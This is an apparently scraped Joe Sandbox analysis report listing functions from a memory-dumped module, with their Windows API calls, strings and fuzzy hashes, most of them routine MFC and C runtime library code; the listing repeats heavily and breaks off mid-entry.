Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: File$Pointer$ErrorLastRead__aullrem_memset
String ID:
API String ID: 123228641-0
Opcode ID: 6c2c065ef67e3e94a3454471708de12189d265c7ae1442853c9ed18230224882
Instruction ID: a5afaed27bd3d0b7053c4769457f87d698a4e0facaad58aaff688c79e6e85134
Opcode Fuzzy Hash: 6c2c065ef67e3e94a3454471708de12189d265c7ae1442853c9ed18230224882
Instruction Fuzzy Hash: 3E519E71608305AFD750CF29C841BABB7ECFF99758F004A2AF958E3641E770D9048BA2

Function 6C91BE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C91BE14
RtlEnterCriticalSection.NTDLL(00000000), ref: 6C91BE25
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?,?,?,?), ref: 6C91BE43
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BE77
RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BEE3
_memset.LIBCMT ref: 6C91BF02
TlsSetValue.KERNEL32(?,00000000), ref: 6C91BF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BF34

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: a3fc592bc6df263a85db40aade37ee72767ae261dc2759ec46b478a5d8488f4a
Instruction ID: ed75140287cb4d8e501039ad69cbc8b5cd341146036969b06408ce50c40d6f6e
Opcode Fuzzy Hash: a3fc592bc6df263a85db40aade37ee72767ae261dc2759ec46b478a5d8488f4a
Instruction Fuzzy Hash: C231B2B0508609EFDB24EF50C886C5AB7B6FF11314B20C52AE65A97F50CB30E954CF80

Function 6C9181FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C91815A: GetParent.USER32(?), ref: 6C9181AE
Part of subcall function 6C91815A: GetLastActivePopup.USER32(?), ref: 6C9181BF
Part of subcall function 6C91815A: IsWindowEnabled.USER32(?), ref: 6C9181D3
Part of subcall function 6C91815A: EnableWindow.USER32(?,00000000), ref: 6C9181E6

EnableWindow.USER32(?,00000001), ref: 6C918247
GetWindowThreadProcessId.USER32(?,?), ref: 6C91825B
GetCurrentProcessId.KERNEL32(?,?), ref: 6C918265
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C91827D
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6C9182F9
EnableWindow.USER32(00000000,00000001), ref: 6C918340

Strings

0, xrefs: 6C9182D2

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 1fd3c558419dd5113a8a9d45c742ecc8f71023fd5eede85e86214881d679c883
Instruction ID: e511abc120d485181ab5814116dfe4fc496417fc1b26c419951f1529a18ff86f
Opcode Fuzzy Hash: 1fd3c558419dd5113a8a9d45c742ecc8f71023fd5eede85e86214881d679c883
Instruction Fuzzy Hash: 56412731A0465C9FDB25CF64CC8ABDA77B8FF11354F21095BE418E6A41D770DE809B98

Function 6C91DE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C91DED6
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6C91DF00
GetSystemMetrics.USER32(00000000), ref: 6C91DF17
GetSystemMetrics.USER32(00000001), ref: 6C91DF1E
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6C91DF49

Strings

DISPLAY, xrefs: 6C91DF40
B, xrefs: 6C91DEE0

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
Opcode ID: 7790554c7894b12a2ee8935c3b8ec39c2e4f2ca0a3af247831a715eb137da569
Instruction ID: 1e7a7c5226f26cdc3294473f69cf19d2baf66f60f0dd1e9ff2068814b75015f6
Opcode Fuzzy Hash: 7790554c7894b12a2ee8935c3b8ec39c2e4f2ca0a3af247831a715eb137da569
Instruction Fuzzy Hash: D421287360D228ABDF128F148C85B5B7BACEF46765F104116FD189BB80D7B0D950CBA0

Function 6C91A200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C91A20A
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6C91A2F0
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C91A30D
RegCloseKey.ADVAPI32(?), ref: 6C91A32D
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6C91A348

Strings

Software\, xrefs: 6C91A26E

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 74cbceb451a2df5a432a57d2d66370070dc7db21d9f7656dbb1539158f4effcb
Instruction ID: 40b96a13a14de7fdae453914d9d985c1588e96dbc7bb32f258047cf0a7551116
Opcode Fuzzy Hash: 74cbceb451a2df5a432a57d2d66370070dc7db21d9f7656dbb1539158f4effcb
Instruction Fuzzy Hash: 3C41A53190511CABCB21DBA4DC89ADEB7BCAF69314F1406D6E019E2A50DB34DF88CF50

Function 6C921861 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C921868
GetPropW.USER32(?,AfxOldWndProc423), ref: 6C921877
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C921900
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6C921907
GlobalDeleteAtom.KERNEL32(?), ref: 6C921911

Part of subcall function 6C920C2C: GetWindowRect.USER32(?,10000000), ref: 6C920C56

Strings

AfxOldWndProc423, xrefs: 6C921870, 6C921875, 6C9218FE, 6C921906

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AtomGlobalProp$DeleteFindH_prolog3_catchRectRemoveWindow
String ID: AfxOldWndProc423
API String ID: 1599575004-1060338832
Opcode ID: 34e346ed9f45e7db03ac2a69635bf4a7d52c4f23d5e1a9c865465b82ca7cbc36
Instruction ID: b737688fbd05321770d3a8d48b5e1c01acf7424012ae09ac55937bee7e8eafe9
Opcode Fuzzy Hash: 34e346ed9f45e7db03ac2a69635bf4a7d52c4f23d5e1a9c865465b82ca7cbc36
Instruction Fuzzy Hash: E431B131810159ABDF019FE0DC49EFF7A78EF16305F100016F645A2954C73AC924DBA1

Function 6C91A082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6C91A08C
RegOpenKeyW.ADVAPI32(?,?,?), ref: 6C91A11A
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C91A13D

Part of subcall function 6C91A02D: __EH_prolog3.LIBCMT ref: 6C91A034

Strings

Software\Classes\, xrefs: 6C91A0CD

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: ca4aacb14459ee01b475f4bb77e002ec383ebb41afff1e44d147d3c9ce848894
Instruction ID: f20193c9dd012fd32e6707dbc669c726e6f3778dba4ddcb739a7d1964263e6c5
Opcode Fuzzy Hash: ca4aacb14459ee01b475f4bb77e002ec383ebb41afff1e44d147d3c9ce848894
Instruction Fuzzy Hash: C7316531C0912CAACB21DBA4DD49BDDB778AF29364F1402D6E859A3A50DB34CF88DF51

Function 6C91D07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6C91D0AE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C91D0D1
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C91D0ED
RegCloseKey.ADVAPI32(?), ref: 6C91D0FD
RegCloseKey.ADVAPI32(?), ref: 6C91D107

Strings

software, xrefs: 6C91D096

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 02508e649ba933e5d11b0b6728330604fe0df364f21749e20e232f0e1d09a3cb
Instruction ID: b230d65491294506786c2234125fcb028bc5b997f14666ef706ca18268eb3214
Opcode Fuzzy Hash: 02508e649ba933e5d11b0b6728330604fe0df364f21749e20e232f0e1d09a3cb
Instruction Fuzzy Hash: 9C11E676D04118FBCB21DA9ACD88DDFBFBDEBCA754B2040AAE504A2111D7319A01DBA0

Function 6C91BEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BEB5
__CxxThrowException@8.LIBCMT ref: 6C91BEBF

Part of subcall function 6C92527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6C9252BD

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BED6
RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BEE3

Part of subcall function 6C916D89: __CxxThrowException@8.LIBCMT ref: 6C916D9F

_memset.LIBCMT ref: 6C91BF02
TlsSetValue.KERNEL32(?,00000000), ref: 6C91BF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BF34

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 40aea93a039cc53570429e815ad0548db98e0a997b5964f31b0bb12649c4ef2a
Instruction ID: 6ef50546966049ec94cc2841e0c1afdb0567adf2e8744c429cce21c4b3e0c260
Opcode Fuzzy Hash: 40aea93a039cc53570429e815ad0548db98e0a997b5964f31b0bb12649c4ef2a
Instruction Fuzzy Hash: B4118674604109AFDB14AF64C886C6ABBB6FF10314760C51AF559D6F24CB30ED54CF50

Function 6C91CA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 6C91CA85
SetErrorMode.KERNEL32(00000000), ref: 6C91CA8D

Part of subcall function 6C91A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C91A6D0
Part of subcall function 6C91A698: SetLastError.KERNEL32(0000006F), ref: 6C91A6E7

GetModuleHandleW.KERNEL32(user32.dll), ref: 6C91CADC
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6C91CAEC

Part of subcall function 6C91C8E2: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C91C91F
Part of subcall function 6C91C8E2: PathFindExtensionW.SHLWAPI(?), ref: 6C91C939
Part of subcall function 6C91C8E2: __wcsdup.LIBCMT ref: 6C91C983
Part of subcall function 6C91C8E2: __wcsdup.LIBCMT ref: 6C91C9C2
Part of subcall function 6C91C8E2: __wcsdup.LIBCMT ref: 6C91CA14

Strings

NotifyWinEvent, xrefs: 6C91CAE6
user32.dll, xrefs: 6C91CAD7

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
String ID: NotifyWinEvent$user32.dll
API String ID: 3531328582-597752486
Opcode ID: 60725cbbac6e32bd141d26b29b33fb22b3111628f436bf989bc9cc327c249797
Instruction ID: 3284134d0ff1fe9775ae0f9e31c365c3dd169b202637503d0a31852a8c8a6b1b
Opcode Fuzzy Hash: 60725cbbac6e32bd141d26b29b33fb22b3111628f436bf989bc9cc327c249797
Instruction Fuzzy Hash: 9701F27060C2188FDB15EFA5C805A9A3BE8EF55314B15846AF909D7F40DF30D908CF65

Function 6C91CD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6C91CD2E
GetSysColor.USER32(00000010), ref: 6C91CD35
GetSysColor.USER32(00000014), ref: 6C91CD3C
GetSysColor.USER32(00000012), ref: 6C91CD43
GetSysColor.USER32(00000006), ref: 6C91CD4A
GetSysColorBrush.USER32(0000000F), ref: 6C91CD57
GetSysColorBrush.USER32(00000006), ref: 6C91CD5E

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 3caf00b0031b09d61a262d70d10bcd68927c582a610c14a6be7f158cd853e6a0
Instruction ID: d598b6cf1c2d90e26a2add5c844289a4ecdfd2c45baea20f9bd5bae6250c7284
Opcode Fuzzy Hash: 3caf00b0031b09d61a262d70d10bcd68927c582a610c14a6be7f158cd853e6a0
Instruction Fuzzy Hash: 5FF0FE71A407445BDB30BB724909B47BAE1FFC4710F16092FE2458BA90E6B6E441DF44

Function 6C92C416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6C92C43E

Part of subcall function 6C924FC4: __getptd.LIBCMT ref: 6C924FD2
Part of subcall function 6C924FC4: __getptd.LIBCMT ref: 6C924FE0

__getptd.LIBCMT ref: 6C92C448

Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F

__getptd.LIBCMT ref: 6C92C456
__getptd.LIBCMT ref: 6C92C464
__getptd.LIBCMT ref: 6C92C46F
_CallCatchBlock2.LIBCMT ref: 6C92C495

Part of subcall function 6C925069: __CallSettingFrame@12.LIBCMT ref: 6C9250B5

Part of subcall function 6C92C53C: __getptd.LIBCMT ref: 6C92C54B
Part of subcall function 6C92C53C: __getptd.LIBCMT ref: 6C92C559

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 50370ec5c7e12e0008e833ba487f6e0ec79f6c1d1e0a57cdf5fade59c0c8fcd0
Instruction ID: 60ccfaa53b3cebfd85367604fcb3f529570d81ae51d0b1e78ce3392cbbeaea25
Opcode Fuzzy Hash: 50370ec5c7e12e0008e833ba487f6e0ec79f6c1d1e0a57cdf5fade59c0c8fcd0
Instruction Fuzzy Hash: 3411E471C14209DFDF00DFA4C844AEDBBB1BB24314F10806AE854A7754DB39DA159F50

Function 6C922932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C922962

Strings

@, xrefs: 6C922A6E
AfxMDIFrame90su, xrefs: 6C922A03
AfxFrameOrView90su, xrefs: 6C922A28
@, xrefs: 6C922B07

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: 2349c4522844362d26b9e7f7618a0253dad48830c2b4e696b973194cc20374ea
Instruction ID: 6673e9cd0603694708d9c8d4b9de66975093fc2faa801512cf5d189cba5a2cd4
Opcode Fuzzy Hash: 2349c4522844362d26b9e7f7618a0253dad48830c2b4e696b973194cc20374ea
Instruction Fuzzy Hash: 2D918572C2120DAEDB40CFA4C585BDEBBFCAF54358F208165ED58E6684E778C644CBA0

Function 6C92C165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C92C17F

Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F

__getptd.LIBCMT ref: 6C92C190
__getptd.LIBCMT ref: 6C92C19E

Strings

csm, xrefs: 6C92C178
MOC, xrefs: 6C92C171

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction ID: 1d4a6da8e2152b75c497e9e20665c891b53a47120f97f3d1208397889ee5133f
Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction Fuzzy Hash: 6EE086325341448FE700EBB4C446B5837A8FB7931CF2501A2D48CCBB6ADB3DDA44C942

Function 6C915670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,6C9149D6,?,00000003), ref: 6C915685
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6C9156B4
GetLastError.KERNEL32 ref: 6C9156C5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6C9156E5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6C915709

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: 265e97aaf4a9913d214cc7849a61176ef5938570d30df0d79b1c1670ac02562b
Instruction ID: 4994dab1a679e788da9fed6586f002d663290ffb4febfea1f9bf0a067c791ea2
Opcode Fuzzy Hash: 265e97aaf4a9913d214cc7849a61176ef5938570d30df0d79b1c1670ac02562b
Instruction Fuzzy Hash: 6111B175388309ABE720DE64CCC2F6777ACEB95B44F210929F682D7681C660FC088678

Function 6C91815A Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C91819B
GetParent.USER32(?), ref: 6C9181AE
GetLastActivePopup.USER32(?), ref: 6C9181BF
IsWindowEnabled.USER32(?), ref: 6C9181D3
EnableWindow.USER32(?,00000000), ref: 6C9181E6

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ParentWindow$ActiveEnableEnabledLastPopup
String ID:
API String ID: 2630416829-0
Opcode ID: b62d0e204b6f3fd834eb8b7bcc90ac91a4a727231e34c1fd9fc5a406714605a0
Instruction ID: ca4f722b439dd4d5330b27000899082f26a3724da9d5edf8e73ebf5688aeca6b
Opcode Fuzzy Hash: b62d0e204b6f3fd834eb8b7bcc90ac91a4a727231e34c1fd9fc5a406714605a0
Instruction Fuzzy Hash: 4911EB3360D6286BD71A06598C42B5A72BC6F46B78F270213FC14D7F04C760CB0166DD

Function 6C91DA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 6C91DA3D
_memset.LIBCMT ref: 6C91DA5B
GetWindowTextW.USER32(00000000,?,00000100), ref: 6C91DA75
lstrcmpW.KERNEL32(?,?,?,?), ref: 6C91DA87
SetWindowTextW.USER32(00000000,?), ref: 6C91DA93

Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
